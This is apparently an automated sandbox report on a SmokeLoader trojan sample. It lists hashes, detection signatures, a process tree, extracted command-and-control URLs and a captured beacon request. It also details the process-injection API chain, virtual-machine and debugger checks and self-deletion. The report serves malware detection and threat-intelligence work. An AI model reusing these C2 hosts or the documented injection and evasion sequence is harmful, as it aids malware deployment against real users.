Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p3jNeWT0GE.exe

Overview

General Information

Sample Name:p3jNeWT0GE.exe
Analysis ID:652394
MD5:25b54f50600604a53e80163b9049421e
SHA1:be28d831c5183368f057f8bec104a2b0babb406c
SHA256:9904784c707abb24585e3e61fa5cc094380206385cbb7d087c968d7dc5ee0991
Tags:DofoilexeSmokeLoader
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • p3jNeWT0GE.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\p3jNeWT0GE.exe" MD5: 25B54F50600604A53E80163B9049421E)
    • p3jNeWT0GE.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\p3jNeWT0GE.exe" MD5: 25B54F50600604A53E80163B9049421E)
      • explorer.exe (PID: 3808 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • hdgaecu (PID: 7136 cmdline: C:\Users\user\AppData\Roaming\hdgaecu MD5: 25B54F50600604A53E80163B9049421E)
    • hdgaecu (PID: 5244 cmdline: C:\Users\user\AppData\Roaming\hdgaecu MD5: 25B54F50600604A53E80163B9049421E)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.p3jNeWT0GE.exe.c215a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              12.2.hdgaecu.c215a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                1.2.p3jNeWT0GE.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  13.2.hdgaecu.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://host-host-file8.com/URL Reputation: Label: malware
                    Source: host-file-host6.comVirustotal: Detection: 18%Perma Link
                    Source: host-host-file8.comVirustotal: Detection: 12%Perma Link
                    Source: p3jNeWT0GE.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\hdgaecuJoe Sandbox ML: detected
                    Source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                    Source: p3jNeWT0GE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Binary string: C:\kurokov covicaf\85\fodeta\yobil\vegemogix\wapa\x.pdb source: p3jNeWT0GE.exe, hdgaecu.4.dr
                    Source: Binary string: {JMC:\kurokov covicaf\85\fodeta\yobil\vegemogix\wapa\x.pdbP5D source: p3jNeWT0GE.exe, hdgaecu.4.dr

                    Networking

                    barindex
                    Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                    Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                    Source: Malware configuration extractorURLs: http://host-file-host6.com/
                    Source: Malware configuration extractorURLs: http://host-host-file8.com/
                    Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcxakxdec.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: host-file-host6.com
                    Source: explorer.exe, 00000004.00000000.397114425.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374277431.00000000026D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobY
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcxakxdec.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: host-file-host6.com
                    Source: unknownDNS traffic detected: queries for: host-file-host6.com

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: Yara matchFile source: 0.2.p3jNeWT0GE.exe.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hdgaecu.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.p3jNeWT0GE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.hdgaecu.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: p3jNeWT0GE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0041FB800_2_0041FB80
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_00C20110
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,12_2_00C20110
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_0040180C Sleep,NtTerminateProcess,13_2_0040180C
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_00401818 Sleep,NtTerminateProcess,13_2_00401818
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_00401822 Sleep,NtTerminateProcess,13_2_00401822
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_00401826 Sleep,NtTerminateProcess,13_2_00401826
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_00401834 Sleep,NtTerminateProcess,13_2_00401834
                    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: p3jNeWT0GE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\p3jNeWT0GE.exe "C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess created: C:\Users\user\Desktop\p3jNeWT0GE.exe "C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\hdgaecu C:\Users\user\AppData\Roaming\hdgaecu
                    Source: C:\Users\user\AppData\Roaming\hdgaecuProcess created: C:\Users\user\AppData\Roaming\hdgaecu C:\Users\user\AppData\Roaming\hdgaecu
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess created: C:\Users\user\Desktop\p3jNeWT0GE.exe "C:\Users\user\Desktop\p3jNeWT0GE.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuProcess created: C:\Users\user\AppData\Roaming\hdgaecu C:\Users\user\AppData\Roaming\hdgaecuJump to behavior
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdgaecuJump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@5/1
                    Source: p3jNeWT0GE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\kurokov covicaf\85\fodeta\yobil\vegemogix\wapa\x.pdb source: p3jNeWT0GE.exe, hdgaecu.4.dr
                    Source: Binary string: {JMC:\kurokov covicaf\85\fodeta\yobil\vegemogix\wapa\x.pdbP5D source: p3jNeWT0GE.exe, hdgaecu.4.dr
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C21970 push ebx; iretd 0_2_00C219B7
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C21977 push ebx; iretd 0_2_00C219B7
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C2198B push ebx; iretd 0_2_00C219B7
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C21970 push ebx; iretd 12_2_00C219B7
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C21977 push ebx; iretd 12_2_00C219B7
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C2198B push ebx; iretd 12_2_00C219B7
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_004011D0 push ebx; iretd 13_2_00401217
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_004011D7 push ebx; iretd 13_2_00401217
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 13_2_004011EB push ebx; iretd 13_2_00401217
                    Source: p3jNeWT0GE.exeStatic PE information: section name: .zineha
                    Source: p3jNeWT0GE.exeStatic PE information: section name: .cixu
                    Source: hdgaecu.4.drStatic PE information: section name: .zineha
                    Source: hdgaecu.4.drStatic PE information: section name: .cixu
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0042A090 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_0042A090
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdgaecuJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hdgaecuJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\p3jnewt0ge.exeJump to behavior
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hdgaecu:Zone.Identifier read attributes | deleteJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Windows\explorer.exe TID: 6908Thread sleep count: 558 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 6996Thread sleep count: 234 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 6112Thread sleep count: 306 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 6112Thread sleep time: -30600s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 964Thread sleep count: 348 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 6924Thread sleep count: 158 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-1714
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 558Jump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeAPI call chain: ExitProcess graph end nodegraph_0-1924
                    Source: explorer.exe, 00000004.00000000.401632230.0000000006389000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                    Source: explorer.exe, 00000004.00000000.437033264.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
                    Source: explorer.exe, 00000004.00000000.437033264.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000004.00000000.398203824.0000000004150000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
                    Source: explorer.exe, 00000004.00000000.437033264.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i&
                    Source: explorer.exe, 00000004.00000000.437472725.0000000007D2A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                    Source: explorer.exe, 00000004.00000000.404835251.0000000007BC5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f8b}
                    Source: explorer.exe, 00000004.00000000.437033264.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00Iy
                    Source: explorer.exe, 00000004.00000000.405019671.0000000007CCB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000v

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeSystem information queried: CodeIntegrityInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuSystem information queried: CodeIntegrityInformationJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00411CF0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00411CF0
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0042A090 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_0042A090
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C20042 push dword ptr fs:[00000030h]0_2_00C20042
                    Source: C:\Users\user\AppData\Roaming\hdgaecuCode function: 12_2_00C20042 push dword ptr fs:[00000030h]12_2_00C20042
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0040F170 _memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040F170
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00411CF0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00411CF0
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0040D690 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040D690

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\explorer.exeFile created: hdgaecu.4.drJump to dropped file
                    Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                    Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeMemory written: C:\Users\user\Desktop\p3jNeWT0GE.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuMemory written: C:\Users\user\AppData\Roaming\hdgaecu base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_00C20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_00C20110
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeThread created: C:\Windows\explorer.exe EIP: 2681930Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuThread created: unknown EIP: 47C1930Jump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeProcess created: C:\Users\user\Desktop\p3jNeWT0GE.exe "C:\Users\user\Desktop\p3jNeWT0GE.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hdgaecuProcess created: C:\Users\user\AppData\Roaming\hdgaecu C:\Users\user\AppData\Roaming\hdgaecuJump to behavior
                    Source: explorer.exe, 00000004.00000000.374144806.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.415508246.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.396938172.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerG
                    Source: explorer.exe, 00000004.00000000.404889078.0000000007C08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386698402.0000000007C08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.400270401.0000000005920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000004.00000000.374144806.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.415508246.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.396938172.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000004.00000000.374144806.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.415508246.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.396938172.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: explorer.exe, 00000004.00000000.396362385.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.373840947.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.414885493.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanPV*
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\p3jNeWT0GE.exeCode function: 0_2_0041C570 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0041C570

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.p3jNeWT0GE.exe.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hdgaecu.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.p3jNeWT0GE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.hdgaecu.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.p3jNeWT0GE.exe.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hdgaecu.c215a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.p3jNeWT0GE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.hdgaecu.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    512
